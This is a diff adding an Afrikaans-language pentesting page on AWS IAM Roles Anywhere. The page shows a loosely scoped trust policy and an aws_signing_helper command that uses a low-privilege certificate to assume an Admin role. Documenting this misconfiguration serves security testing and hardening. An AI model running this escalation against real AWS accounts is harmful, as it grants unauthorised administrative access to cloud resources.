Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md

@@ -0,0 +1,42 @@
+# AWS - IAM Roles Anywhere Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+AWS IAM RolesAnywhere laat werklas buiten AWS toe om IAM rolle te aanvaar met behulp van X.509 sertifikate. Maar wanneer vertrouensbeleide nie behoorlik afgebaken is nie, kan dit misbruik word vir privilige-eskalasie.
+
+Hierdie beleid ontbreek beperkings op watter vertrouensanker of sertifikaatattribuut toegelaat word. As gevolg hiervan kan enige sertifikaat wat aan enige vertrouensanker in die rekening gekoppel is, gebruik word om hierdie rol aan te neem.
+```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Service": "rolesanywhere.amazonaws.com"
+},
+"Action": [
+"sts:AssumeRole",
+"sts:SetSourceIdentity",
+"sts:TagSession"
+]
+}
+]
+}
+
+```
+Om privesc te verkry, is die `aws_signing_helper` benodig van https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+Dan kan die aanvaller met 'n geldige sertifikaat in die hoër bevoegdheid rol beweeg.
+```bash
+aws_signing_helper credential-process \
+--certificate readonly.pem \
+--private-key readonly.key \
+--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+--role-arn arn:aws:iam::123456789012:role/Admin
+```
+### Verwysings
+
+- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
+
+{{#include ../../../../banners/hacktricks-training.md}}